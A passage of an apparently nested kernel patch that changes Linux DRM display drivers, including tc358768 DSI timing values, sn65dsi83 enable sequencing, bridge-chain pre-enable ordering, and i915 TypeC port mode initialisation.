++	/* TCLK_PREPARE + TCLK_ZERO > 300ns */
++	val2 = tc358768_ns_to_cnt(300 - tc358768_to_ns(2 * ui_nsk),
++				  dsibclk_nsk) - 2;
++	val |= val2 << 8;
+ 	dev_dbg(priv->dev, "TCLK_HEADERCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_HEADERCNT, val);
+ 
+-	/* TCLK_TRAIL > 60ns + 3*UI */
+-	val = 60 + tc358768_to_ns(3 * ui_nsk);
+-	val = tc358768_ns_to_cnt(val, dsibclk_nsk) - 5;
++	/* TCLK_TRAIL > 60ns AND TEOT <= 105 ns + 12*UI */
++	raw_val = tc358768_ns_to_cnt(60 + tc358768_to_ns(2 * ui_nsk), dsibclk_nsk) - 5;
++	val = clamp(raw_val, 0, 127);
+ 	dev_dbg(priv->dev, "TCLK_TRAILCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_TRAILCNT, val);
+ 
+ 	/* 40ns + 4*UI < THS_PREPARE < 85ns + 6*UI */
+ 	val = 50 + tc358768_to_ns(4 * ui_nsk);
+ 	val = tc358768_ns_to_cnt(val, dsibclk_nsk) - 1;
+-	/* THS_ZERO > 145ns + 10*UI */
+-	val2 = tc358768_ns_to_cnt(145 - tc358768_to_ns(ui_nsk), dsibclk_nsk);
+-	val |= (val2 - tc358768_to_ns(phy_delay_nsk)) << 8;
++	/* THS_PREPARE + THS_ZERO > 145ns + 10*UI */
++	raw_val = tc358768_ns_to_cnt(145 - tc358768_to_ns(3 * ui_nsk), dsibclk_nsk) - 10;
++	val2 = clamp(raw_val, 0, 127);
++	val |= val2 << 8;
+ 	dev_dbg(priv->dev, "THS_HEADERCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_THS_HEADERCNT, val);
+ 
+@@ -771,9 +781,10 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	dev_dbg(priv->dev, "TCLK_POSTCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_POSTCNT, val);
+ 
+-	/* 60ns + 4*UI < THS_PREPARE < 105ns + 12*UI */
+-	val = tc358768_ns_to_cnt(60 + tc358768_to_ns(15 * ui_nsk),
+-				 dsibclk_nsk) - 5;
++	/* max(60ns + 4*UI, 8*UI) < THS_TRAILCNT < 105ns + 12*UI */
++	raw_val = tc358768_ns_to_cnt(60 + tc358768_to_ns(18 * ui_nsk),
++				     dsibclk_nsk) - 4;
++	val = clamp(raw_val, 0, 15);
+ 	dev_dbg(priv->dev, "THS_TRAILCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_THS_TRAILCNT, val);
+ 
+@@ -787,7 +798,7 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 	/* TXTAGOCNT[26:16] RXTASURECNT[10:0] */
+ 	val = tc358768_to_ns((lptxcnt + 1) * dsibclk_nsk * 4);
+-	val = tc358768_ns_to_cnt(val, dsibclk_nsk) - 1;
++	val = tc358768_ns_to_cnt(val, dsibclk_nsk) / 4 - 1;
+ 	val2 = tc358768_ns_to_cnt(tc358768_to_ns((lptxcnt + 1) * dsibclk_nsk),
+ 				  dsibclk_nsk) - 2;
+ 	val = val << 16 | val2;
+@@ -867,8 +878,7 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	val = TC358768_DSI_CONFW_MODE_SET | TC358768_DSI_CONFW_ADDR_DSI_CONTROL;
+ 	val |= (dsi_dev->lanes - 1) << 1;
+ 
+-	if (!(dsi_dev->mode_flags & MIPI_DSI_MODE_LPM))
+-		val |= TC358768_DSI_CONTROL_TXMD;
++	val |= TC358768_DSI_CONTROL_TXMD;
+ 
+ 	if (!(mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS))
+ 		val |= TC358768_DSI_CONTROL_HSCKMD;
+@@ -914,6 +924,44 @@ static void tc358768_bridge_enable(struct drm_bridge *bridge)
+ 	}
+ }
+ 
++#define MAX_INPUT_SEL_FORMATS	1
++
++static u32 *
++tc358768_atomic_get_input_bus_fmts(struct drm_bridge *bridge,
++				   struct drm_bridge_state *bridge_state,
++				   struct drm_crtc_state *crtc_state,
++				   struct drm_connector_state *conn_state,
++				   u32 output_fmt,
++				   unsigned int *num_input_fmts)
++{
++	struct tc358768_priv *priv = bridge_to_tc358768(bridge);
++	u32 *input_fmts;
++
++	*num_input_fmts = 0;
++
++	input_fmts = kcalloc(MAX_INPUT_SEL_FORMATS, sizeof(*input_fmts),
++			     GFP_KERNEL);
++	if (!input_fmts)
++		return NULL;
++
++	switch (priv->pd_lines) {
++	case 16:
++		input_fmts[0] = MEDIA_BUS_FMT_RGB565_1X16;
++		break;
++	case 18:
++		input_fmts[0] = MEDIA_BUS_FMT_RGB666_1X18;
++		break;
++	default:
++	case 24:
++		input_fmts[0] = MEDIA_BUS_FMT_RGB888_1X24;
++		break;
++	};
++
++	*num_input_fmts = MAX_INPUT_SEL_FORMATS;
++
++	return input_fmts;
++}
++
+ static const struct drm_bridge_funcs tc358768_bridge_funcs = {
+ 	.attach = tc358768_bridge_attach,
+ 	.mode_valid = tc358768_bridge_mode_valid,
+@@ -921,6 +969,11 @@ static const struct drm_bridge_funcs tc358768_bridge_funcs = {
+ 	.enable = tc358768_bridge_enable,
+ 	.disable = tc358768_bridge_disable,
+ 	.post_disable = tc358768_bridge_post_disable,
++
++	.atomic_duplicate_state = drm_atomic_helper_bridge_duplicate_state,
++	.atomic_destroy_state = drm_atomic_helper_bridge_destroy_state,
++	.atomic_reset = drm_atomic_helper_bridge_reset,
++	.atomic_get_input_bus_fmts = tc358768_atomic_get_input_bus_fmts,
+ };
+ 
+ static const struct drm_bridge_timings default_tc358768_timings = {
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi83.c b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+index 047c14ddbbf11..55efd3eb66723 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi83.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+@@ -321,8 +321,8 @@ static u8 sn65dsi83_get_dsi_div(struct sn65dsi83 *ctx)
+ 	return dsi_div - 1;
+ }
+ 
+-static void sn65dsi83_atomic_enable(struct drm_bridge *bridge,
+-				    struct drm_bridge_state *old_bridge_state)
++static void sn65dsi83_atomic_pre_enable(struct drm_bridge *bridge,
++					struct drm_bridge_state *old_bridge_state)
+ {
+ 	struct sn65dsi83 *ctx = bridge_to_sn65dsi83(bridge);
+ 	struct drm_atomic_state *state = old_bridge_state->base.state;
+@@ -478,17 +478,29 @@ static void sn65dsi83_atomic_enable(struct drm_bridge *bridge,
+ 		dev_err(ctx->dev, "failed to lock PLL, ret=%i\n", ret);
+ 		/* On failure, disable PLL again and exit. */
+ 		regmap_write(ctx->regmap, REG_RC_PLL_EN, 0x00);
++		regulator_disable(ctx->vcc);
+ 		return;
+ 	}
+ 
+ 	/* Trigger reset after CSR register update. */
+ 	regmap_write(ctx->regmap, REG_RC_RESET, REG_RC_RESET_SOFT_RESET);
+ 
++	/* Wait for 10ms after soft reset as specified in datasheet */
++	usleep_range(10000, 12000);
++}
++
++static void sn65dsi83_atomic_enable(struct drm_bridge *bridge,
++				    struct drm_bridge_state *old_bridge_state)
++{
++	struct sn65dsi83 *ctx = bridge_to_sn65dsi83(bridge);
++	unsigned int pval;
++
+ 	/* Clear all errors that got asserted during initialization. */
+ 	regmap_read(ctx->regmap, REG_IRQ_STAT, &pval);
+ 	regmap_write(ctx->regmap, REG_IRQ_STAT, pval);
+ 
+-	usleep_range(10000, 12000);
++	/* Wait for 1ms and check for errors in status register */
++	usleep_range(1000, 1100);
+ 	regmap_read(ctx->regmap, REG_IRQ_STAT, &pval);
+ 	if (pval)
+ 		dev_err(ctx->dev, "Unexpected link status 0x%02x\n", pval);
+@@ -555,6 +567,7 @@ static const struct drm_bridge_funcs sn65dsi83_funcs = {
+ 	.attach			= sn65dsi83_attach,
+ 	.detach			= sn65dsi83_detach,
+ 	.atomic_enable		= sn65dsi83_atomic_enable,
++	.atomic_pre_enable	= sn65dsi83_atomic_pre_enable,
+ 	.atomic_disable		= sn65dsi83_atomic_disable,
+ 	.mode_valid		= sn65dsi83_mode_valid,
+ 
+@@ -695,6 +708,7 @@ static int sn65dsi83_probe(struct i2c_client *client,
+ 
+ 	ctx->bridge.funcs = &sn65dsi83_funcs;
+ 	ctx->bridge.of_node = dev->of_node;
++	ctx->bridge.pre_enable_prev_first = true;
+ 	drm_bridge_add(&ctx->bridge);
+ 
+ 	ret = sn65dsi83_host_attach(ctx);
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 38dab76ae69ea..e2e21ce79510e 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -3404,7 +3404,7 @@ int drm_dp_add_payload_part2(struct drm_dp_mst_topology_mgr *mgr,
+ 
+ 	/* Skip failed payloads */
+ 	if (payload->vc_start_slot == -1) {
+-		drm_dbg_kms(state->dev, "Part 1 of payload creation for %s failed, skipping part 2\n",
++		drm_dbg_kms(mgr->dev, "Part 1 of payload creation for %s failed, skipping part 2\n",
+ 			    payload->port->connector->name);
+ 		return -EIO;
+ 	}
+diff --git a/drivers/gpu/drm/drm_bridge.c b/drivers/gpu/drm/drm_bridge.c
+index 1545c50fd1c8f..7044e339a82cd 100644
+--- a/drivers/gpu/drm/drm_bridge.c
++++ b/drivers/gpu/drm/drm_bridge.c
+@@ -691,6 +691,25 @@ void drm_atomic_bridge_chain_disable(struct drm_bridge *bridge,
+ }
+ EXPORT_SYMBOL(drm_atomic_bridge_chain_disable);
+ 
++static void drm_atomic_bridge_call_post_disable(struct drm_bridge *bridge,
++						struct drm_atomic_state *old_state)
++{
++	if (old_state && bridge->funcs->atomic_post_disable) {
++		struct drm_bridge_state *old_bridge_state;
++
++		old_bridge_state =
++			drm_atomic_get_old_bridge_state(old_state,
++							bridge);
++		if (WARN_ON(!old_bridge_state))
++			return;
++
++		bridge->funcs->atomic_post_disable(bridge,
++						   old_bridge_state);
++	} else if (bridge->funcs->post_disable) {
++		bridge->funcs->post_disable(bridge);
++	}
++}
++
+ /**
+  * drm_atomic_bridge_chain_post_disable - cleans up after disabling all bridges
+  *					  in the encoder chain
+@@ -702,36 +721,86 @@ EXPORT_SYMBOL(drm_atomic_bridge_chain_disable);
+  * starting from the first bridge to the last. These are called after completing
+  * &drm_encoder_helper_funcs.atomic_disable
+  *
++ * If a bridge sets @pre_enable_prev_first, then the @post_disable for that
++ * bridge will be called before the previous one to reverse the @pre_enable
++ * calling direction.
++ *
+  * Note: the bridge passed should be the one closest to the encoder
+  */
+ void drm_atomic_bridge_chain_post_disable(struct drm_bridge *bridge,
+ 					  struct drm_atomic_state *old_state)
+ {
+ 	struct drm_encoder *encoder;
++	struct drm_bridge *next, *limit;
+ 
+ 	if (!bridge)
+ 		return;
+ 
+ 	encoder = bridge->encoder;
++
+ 	list_for_each_entry_from(bridge, &encoder->bridge_chain, chain_node) {
+-		if (bridge->funcs->atomic_post_disable) {
+-			struct drm_bridge_state *old_bridge_state;
++		limit = NULL;
++
++		if (!list_is_last(&bridge->chain_node, &encoder->bridge_chain)) {
++			next = list_next_entry(bridge, chain_node);
++
++			if (next->pre_enable_prev_first) {
++				/* next bridge had requested that prev
++				 * was enabled first, so disabled last
++				 */
++				limit = next;
++
++				/* Find the next bridge that has NOT requested
++				 * prev to be enabled first / disabled last
++				 */
++				list_for_each_entry_from(next, &encoder->bridge_chain,
++							 chain_node) {
++					if (next->pre_enable_prev_first) {
++						next = list_prev_entry(next, chain_node);
++						limit = next;
++						break;
++					}
++				}
++
++				/* Call these bridges in reverse order */
++				list_for_each_entry_from_reverse(next, &encoder->bridge_chain,
++								 chain_node) {
++					if (next == bridge)
++						break;
++
++					drm_atomic_bridge_call_post_disable(next,
++									    old_state);
++				}
++			}
++		}
+ 
+-			old_bridge_state =
+-				drm_atomic_get_old_bridge_state(old_state,
+-								bridge);
+-			if (WARN_ON(!old_bridge_state))
+-				return;
++		drm_atomic_bridge_call_post_disable(bridge, old_state);
+ 
+-			bridge->funcs->atomic_post_disable(bridge,
+-							   old_bridge_state);
+-		} else if (bridge->funcs->post_disable) {
+-			bridge->funcs->post_disable(bridge);
+-		}
++		if (limit)
++			/* Jump all bridges that we have already post_disabled */
++			bridge = limit;
+ 	}
+ }
+ EXPORT_SYMBOL(drm_atomic_bridge_chain_post_disable);
+ 
++static void drm_atomic_bridge_call_pre_enable(struct drm_bridge *bridge,
++					      struct drm_atomic_state *old_state)
++{
++	if (old_state && bridge->funcs->atomic_pre_enable) {
++		struct drm_bridge_state *old_bridge_state;
++
++		old_bridge_state =
++			drm_atomic_get_old_bridge_state(old_state,
++							bridge);
++		if (WARN_ON(!old_bridge_state))
++			return;
++
++		bridge->funcs->atomic_pre_enable(bridge, old_bridge_state);
++	} else if (bridge->funcs->pre_enable) {
++		bridge->funcs->pre_enable(bridge);
++	}
++}
++
+ /**
+  * drm_atomic_bridge_chain_pre_enable - prepares for enabling all bridges in
+  *					the encoder chain
+@@ -743,32 +812,60 @@ EXPORT_SYMBOL(drm_atomic_bridge_chain_post_disable);
+  * starting from the last bridge to the first. These are called before calling
+  * &drm_encoder_helper_funcs.atomic_enable
+  *
++ * If a bridge sets @pre_enable_prev_first, then the pre_enable for the
++ * prev bridge will be called before pre_enable of this bridge.
++ *
+  * Note: the bridge passed should be the one closest to the encoder
+  */
+ void drm_atomic_bridge_chain_pre_enable(struct drm_bridge *bridge,
+ 					struct drm_atomic_state *old_state)
+ {
+ 	struct drm_encoder *encoder;
+-	struct drm_bridge *iter;
++	struct drm_bridge *iter, *next, *limit;
+ 
+ 	if (!bridge)
+ 		return;
+ 
+ 	encoder = bridge->encoder;
++
+ 	list_for_each_entry_reverse(iter, &encoder->bridge_chain, chain_node) {
+-		if (iter->funcs->atomic_pre_enable) {
+-			struct drm_bridge_state *old_bridge_state;
++		if (iter->pre_enable_prev_first) {
++			next = iter;
++			limit = bridge;
++			list_for_each_entry_from_reverse(next,
++							 &encoder->bridge_chain,
++							 chain_node) {
++				if (next == bridge)
++					break;
++
++				if (!next->pre_enable_prev_first) {
++					/* Found first bridge that does NOT
++					 * request prev to be enabled first
++					 */
++					limit = list_prev_entry(next, chain_node);
++					break;
++				}
++			}
++
++			list_for_each_entry_from(next, &encoder->bridge_chain, chain_node) {
++				/* Call requested prev bridge pre_enable
++				 * in order.
++				 */
++				if (next == iter)
++					/* At the first bridge to request prev
++					 * bridges called first.
++					 */
++					break;
++
++				drm_atomic_bridge_call_pre_enable(next, old_state);
++			}
++		}
+ 
+-			old_bridge_state =
+-				drm_atomic_get_old_bridge_state(old_state,
+-								iter);
+-			if (WARN_ON(!old_bridge_state))
+-				return;
++		drm_atomic_bridge_call_pre_enable(iter, old_state);
+ 
+-			iter->funcs->atomic_pre_enable(iter, old_bridge_state);
+-		} else if (iter->funcs->pre_enable) {
+-			iter->funcs->pre_enable(iter);
+-		}
++		if (iter->pre_enable_prev_first)
++			/* Jump all bridges that we have already pre_enabled */
++			iter = limit;
+ 
+ 		if (iter == bridge)
+ 			break;
+diff --git a/drivers/gpu/drm/drm_gem_vram_helper.c b/drivers/gpu/drm/drm_gem_vram_helper.c
+index 125160b534bef..928e08e0b5b86 100644
+--- a/drivers/gpu/drm/drm_gem_vram_helper.c
++++ b/drivers/gpu/drm/drm_gem_vram_helper.c
+@@ -44,7 +44,7 @@ static const struct drm_gem_object_funcs drm_gem_vram_object_funcs;
+  * the frame's scanout buffer or the cursor image. If there's no more space
+  * left in VRAM, inactive GEM objects can be moved to system memory.
+  *
+- * To initialize the VRAM helper library call drmm_vram_helper_alloc_mm().
++ * To initialize the VRAM helper library call drmm_vram_helper_init().
+  * The function allocates and initializes an instance of &struct drm_vram_mm
+  * in &struct drm_device.vram_mm . Use &DRM_GEM_VRAM_DRIVER to initialize
+  * &struct drm_driver and  &DRM_VRAM_MM_FILE_OPERATIONS to initialize
+@@ -72,7 +72,7 @@ static const struct drm_gem_object_funcs drm_gem_vram_object_funcs;
+  *		// setup device, vram base and size
+  *		// ...
+  *
+- *		ret = drmm_vram_helper_alloc_mm(dev, vram_base, vram_size);
++ *		ret = drmm_vram_helper_init(dev, vram_base, vram_size);
+  *		if (ret)
+  *			return ret;
+  *		return 0;
+@@ -85,7 +85,7 @@ static const struct drm_gem_object_funcs drm_gem_vram_object_funcs;
+  * to userspace.
+  *
+  * You don't have to clean up the instance of VRAM MM.
+- * drmm_vram_helper_alloc_mm() is a managed interface that installs a
++ * drmm_vram_helper_init() is a managed interface that installs a
+  * clean-up handler to run during the DRM device's release.
+  *
+  * For drawing or scanout operations, rsp. buffer objects have to be pinned
+diff --git a/drivers/gpu/drm/i915/display/intel_ddi.c b/drivers/gpu/drm/i915/display/intel_ddi.c
+index 69ecf2a3d6c65..706e2d956801d 100644
+--- a/drivers/gpu/drm/i915/display/intel_ddi.c
++++ b/drivers/gpu/drm/i915/display/intel_ddi.c
+@@ -3579,7 +3579,7 @@ static void intel_ddi_sync_state(struct intel_encoder *encoder,
+ 	enum phy phy = intel_port_to_phy(i915, encoder->port);
+ 
+ 	if (intel_phy_is_tc(i915, phy))
+-		intel_tc_port_sanitize(enc_to_dig_port(encoder));
++		intel_tc_port_sanitize_mode(enc_to_dig_port(encoder));
+ 
+ 	if (crtc_state && intel_crtc_has_dp_encoder(crtc_state))
+ 		intel_dp_sync_state(encoder, crtc_state);
+@@ -3789,11 +3789,17 @@ static void intel_ddi_encoder_destroy(struct drm_encoder *encoder)
+ 
+ static void intel_ddi_encoder_reset(struct drm_encoder *encoder)
+ {
++	struct drm_i915_private *i915 = to_i915(encoder->dev);
+ 	struct intel_dp *intel_dp = enc_to_intel_dp(to_intel_encoder(encoder));
++	struct intel_digital_port *dig_port = enc_to_dig_port(to_intel_encoder(encoder));
++	enum phy phy = intel_port_to_phy(i915, dig_port->base.port);
+ 
+ 	intel_dp->reset_link_params = true;
+ 
+ 	intel_pps_encoder_reset(intel_dp);
++
++	if (intel_phy_is_tc(i915, phy))
++		intel_tc_port_init_mode(dig_port);
+ }
+ 
+ static const struct drm_encoder_funcs intel_ddi_funcs = {
+diff --git a/drivers/gpu/drm/i915/display/intel_display_types.h b/drivers/gpu/drm/i915/display/intel_display_types.h
+index 63b7105e818a6..a8bf91a21cb24 100644
+--- a/drivers/gpu/drm/i915/display/intel_display_types.h
++++ b/drivers/gpu/drm/i915/display/intel_display_types.h
+@@ -1763,6 +1763,7 @@ struct intel_digital_port {
+ 	bool tc_legacy_port:1;
+ 	char tc_port_name[8];
+ 	enum tc_port_mode tc_mode;
++	enum tc_port_mode tc_init_mode;
+ 	enum phy_fia tc_phy_fia;
+ 	u8 tc_phy_fia_idx;
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_psr.c b/drivers/gpu/drm/i915/display/intel_psr.c
+index bf18423c7a005..e2d7c0a6802aa 100644
+--- a/drivers/gpu/drm/i915/display/intel_psr.c
++++ b/drivers/gpu/drm/i915/display/intel_psr.c
+@@ -857,9 +857,9 @@ static bool _compute_psr2_wake_times(struct intel_dp *intel_dp,
+ 	}
+ 
+ 	io_wake_lines = intel_usecs_to_scanlines(
+-		&crtc_state->uapi.adjusted_mode, io_wake_time);
++		&crtc_state->hw.adjusted_mode, io_wake_time);
+ 	fast_wake_lines = intel_usecs_to_scanlines(
+-		&crtc_state->uapi.adjusted_mode, fast_wake_time);
++		&crtc_state->hw.adjusted_mode, fast_wake_time);
+ 
+ 	if (io_wake_lines > max_wake_lines ||
+ 	    fast_wake_lines > max_wake_lines)
+diff --git a/drivers/gpu/drm/i915/display/intel_tc.c b/drivers/gpu/drm/i915/display/intel_tc.c
+index 8d6dac32c8960..bda77828dc95f 100644
+--- a/drivers/gpu/drm/i915/display/intel_tc.c
++++ b/drivers/gpu/drm/i915/display/intel_tc.c
+@@ -5,6 +5,7 @@
+ 
+ #include "i915_drv.h"
+ #include "i915_reg.h"
++#include "intel_de.h"
+ #include "intel_display.h"
+ #include "intel_display_power_map.h"
+ #include "intel_display_types.h"
+@@ -116,6 +117,24 @@ assert_tc_cold_blocked(struct intel_digital_port *dig_port)
+ 	drm_WARN_ON(&i915->drm, !enabled);
+ }
+ 
++static enum intel_display_power_domain
++tc_port_power_domain(struct intel_digital_port *dig_port)
++{
++	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
++	enum tc_port tc_port = intel_port_to_tc(i915, dig_port->base.port);
++
++	return POWER_DOMAIN_PORT_DDI_LANES_TC1 + tc_port - TC_PORT_1;
++}
++
++static void
++assert_tc_port_power_enabled(struct intel_digital_port *dig_port)
++{
++	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
++
++	drm_WARN_ON(&i915->drm,
++		    !intel_display_power_is_enabled(i915, tc_port_power_domain(dig_port)));
++}
++
+ u32 intel_tc_port_get_lane_mask(struct intel_digital_port *dig_port)
+ {
+ 	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
+@@ -683,46 +702,104 @@ static void intel_tc_port_update_mode(struct intel_digital_port *dig_port,
+ 	tc_cold_unblock(dig_port, domain, wref);
+ }
+ 
+-static void
+-intel_tc_port_link_init_refcount(struct intel_digital_port *dig_port,
+-				 int refcount)
++static void __intel_tc_port_get_link(struct intel_digital_port *dig_port)
++{
++	dig_port->tc_link_refcount++;
++}
++
++static void __intel_tc_port_put_link(struct intel_digital_port *dig_port)
++{
++	dig_port->tc_link_refcount--;
++}
++
++static bool tc_port_is_enabled(struct intel_digital_port *dig_port)
+ {
+ 	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
+ 
+-	drm_WARN_ON(&i915->drm, dig_port->tc_link_refcount);
+-	dig_port->tc_link_refcount = refcount;
++	assert_tc_port_power_enabled(dig_port);
++
++	return intel_de_read(i915, DDI_BUF_CTL(dig_port->base.port)) &
++	       DDI_BUF_CTL_ENABLE;
+ }
+ 
+-void intel_tc_port_sanitize(struct intel_digital_port *dig_port)
++/**
++ * intel_tc_port_init_mode: Read out HW state and init the given port's TypeC mode
++ * @dig_port: digital port
++ *
++ * Read out the HW state and initialize the TypeC mode of @dig_port. The mode
++ * will be locked until intel_tc_port_sanitize_mode() is called.
++ */
++void intel_tc_port_init_mode(struct intel_digital_port *dig_port)
+ {
+ 	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
+-	struct intel_encoder *encoder = &dig_port->base;
+ 	intel_wakeref_t tc_cold_wref;
+ 	enum intel_display_power_domain domain;
+-	int active_links = 0;
+ 
+ 	mutex_lock(&dig_port->tc_lock);
+ 
+-	if (dig_port->dp.is_mst)
+-		active_links = intel_dp_mst_encoder_active_links(dig_port);
+-	else if (encoder->base.crtc)
+-		active_links = to_intel_crtc(encoder->base.crtc)->active;
+-
+ 	drm_WARN_ON(&i915->drm, dig_port->tc_mode != TC_PORT_DISCONNECTED);
+ 	drm_WARN_ON(&i915->drm, dig_port->tc_lock_wakeref);
++	drm_WARN_ON(&i915->drm, dig_port->tc_link_refcount);
+ 
+ 	tc_cold_wref = tc_cold_block(dig_port, &domain);
+ 
+ 	dig_port->tc_mode = intel_tc_port_get_current_mode(dig_port);
++	/*
++	 * Save the initial mode for the state check in
++	 * intel_tc_port_sanitize_mode().
++	 */
++	dig_port->tc_init_mode = dig_port->tc_mode;
++	dig_port->tc_lock_wakeref = tc_cold_block(dig_port, &dig_port->tc_lock_power_domain);
++
++	/*
++	 * The PHY needs to be connected for AUX to work during HW readout and
++	 * MST topology resume, but the PHY mode can only be changed if the
++	 * port is disabled.
++	 */
++	if (!tc_port_is_enabled(dig_port))
++		intel_tc_port_update_mode(dig_port, 1, false);
++
++	/* Prevent changing dig_port->tc_mode until intel_tc_port_sanitize_mode() is called. */
++	__intel_tc_port_get_link(dig_port);
++
++	tc_cold_unblock(dig_port, domain, tc_cold_wref);
++
++	drm_dbg_kms(&i915->drm, "Port %s: init mode (%s)\n",
++		    dig_port->tc_port_name,
++		    tc_port_mode_name(dig_port->tc_mode));
++
++	mutex_unlock(&dig_port->tc_lock);
++}
++
++/**
++ * intel_tc_port_sanitize_mode: Sanitize the given port's TypeC mode
++ * @dig_port: digital port
++ *
++ * Sanitize @dig_port's TypeC mode wrt. the encoder's state right after driver
++ * loading and system resume:
++ * If the encoder is enabled keep the TypeC mode/PHY connected state locked until
++ * the encoder is disabled.
++ * If the encoder is disabled make sure the PHY is disconnected.
++ */
++void intel_tc_port_sanitize_mode(struct intel_digital_port *dig_port)
++{
++	struct drm_i915_private *i915 = to_i915(dig_port->base.base.dev);
++	struct intel_encoder *encoder = &dig_port->base;
++	int active_links = 0;
++
++	mutex_lock(&dig_port->tc_lock);
++
++	if (dig_port->dp.is_mst)
++		active_links = intel_dp_mst_encoder_active_links(dig_port);
++	else if (encoder->base.crtc)
++		active_links = to_intel_crtc(encoder->base.crtc)->active;
++
++	drm_WARN_ON(&i915->drm, dig_port->tc_link_refcount != 1);
+ 	if (active_links) {
+ 		if (!icl_tc_phy_is_connected(dig_port))
+ 			drm_dbg_kms(&i915->drm,
+ 				    "Port %s: PHY disconnected with %d active link(s)\n",
+ 				    dig_port->tc_port_name, active_links);
+-		intel_tc_port_link_init_refcount(dig_port, active_links);
+-
+-		dig_port->tc_lock_wakeref = tc_cold_block(dig_port,
+-							  &dig_port->tc_lock_power_domain);
+ 	} else {
+ 		/*
+ 		 * TBT-alt is the default mode in any case the PHY ownership is not
+@@ -730,15 +807,17 @@ void intel_tc_port_sanitize(struct intel_digital_port *dig_port)
+ 		 * we'll just switch to disconnected mode from it here without
+ 		 * a note.
+ 		 */
+-		if (dig_port->tc_mode != TC_PORT_TBT_ALT)
++		if (dig_port->tc_init_mode != TC_PORT_TBT_ALT)
+ 			drm_dbg_kms(&i915->drm,
+ 				    "Port %s: PHY left in %s mode on disabled port, disconnecting it\n",
+ 				    dig_port->tc_port_name,
+-				    tc_port_mode_name(dig_port->tc_mode));
++				    tc_port_mode_name(dig_port->tc_init_mode));
+ 		icl_tc_phy_disconnect(dig_port);
+-	}
++		__intel_tc_port_put_link(dig_port);
+ 
+-	tc_cold_unblock(dig_port, domain, tc_cold_wref);
++		tc_cold_unblock(dig_port, dig_port->tc_lock_power_domain,
++				fetch_and_zero(&dig_port->tc_lock_wakeref));
++	}
+ 
+ 	drm_dbg_kms(&i915->drm, "Port %s: sanitize mode (%s)\n",
+ 		    dig_port->tc_port_name,
+@@ -846,14 +925,14 @@ void intel_tc_port_get_link(struct intel_digital_port *dig_port,
+ 			    int required_lanes)
+ {
+ 	__intel_tc_port_lock(dig_port, required_lanes);
+-	dig_port->tc_link_refcount++;
++	__intel_tc_port_get_link(dig_port);
+ 	intel_tc_port_unlock(dig_port);
+ }
+ 
+ void intel_tc_port_put_link(struct intel_digital_port *dig_port)
+ {
+ 	intel_tc_port_lock(dig_port);
+-	--dig_port->tc_link_refcount;
++	__intel_tc_port_put_link(dig_port);
+ 	intel_tc_port_unlock(dig_port);
+ 
+ 	/*
+@@ -923,4 +1002,6 @@ void intel_tc_port_init(struct intel_digital_port *dig_port, bool is_legacy)
+ 	dig_port->tc_mode = TC_PORT_DISCONNECTED;
+ 	dig_port->tc_link_refcount = 0;
+ 	tc_port_load_fia_params(i915, dig_port);
++
++	intel_tc_port_init_mode(dig_port);
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_tc.h b/drivers/gpu/drm/i915/display/intel_tc.h
+index 6b47b29f551c9..d54082e2d5e8d 100644
+--- a/drivers/gpu/drm/i915/display/intel_tc.h
++++ b/drivers/gpu/drm/i915/display/intel_tc.h
+@@ -24,7 +24,8 @@ int intel_tc_port_fia_max_lane_count(struct intel_digital_port *dig_port);
+ void intel_tc_port_set_fia_lane_count(struct intel_digital_port *dig_port,
+ 				      int required_lanes);
+ 
+-void intel_tc_port_sanitize(struct intel_digital_port *dig_port);
++void intel_tc_port_init_mode(struct intel_digital_port *dig_port);
++void intel_tc_port_sanitize_mode(struct intel_digital_port *dig_port);
+ void intel_tc_port_lock(struct intel_digital_port *dig_port);
+ void intel_tc_port_unlock(struct intel_digital_port *dig_port);
+ void intel_tc_port_flush_work(struct intel_digital_port *dig_port);
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_slpc.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_slpc.c
+index fdd895f73f9f1..72ba1c758ca79 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_slpc.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_slpc.c
+@@ -580,7 +580,7 @@ static int slpc_set_softlimits(struct intel_guc_slpc *slpc)
+ 		if (unlikely(ret))
+ 			return ret;
+ 		slpc_to_gt(slpc)->defaults.min_freq = slpc->min_freq_softlimit;
+-	} else if (slpc->min_freq_softlimit != slpc->min_freq) {
++	} else {
+ 		return intel_guc_slpc_set_min_freq(slpc,
+ 						   slpc->min_freq_softlimit);
+ 	}
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 24feae285ccd6..0829eaf2cd4e8 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -1740,6 +1740,7 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ {
+ 	struct msm_drm_private *priv = dev->dev_private;
+ 	struct platform_device *pdev = priv->gpu_pdev;
++	struct adreno_platform_config *config = pdev->dev.platform_data;
+ 	struct a5xx_gpu *a5xx_gpu = NULL;
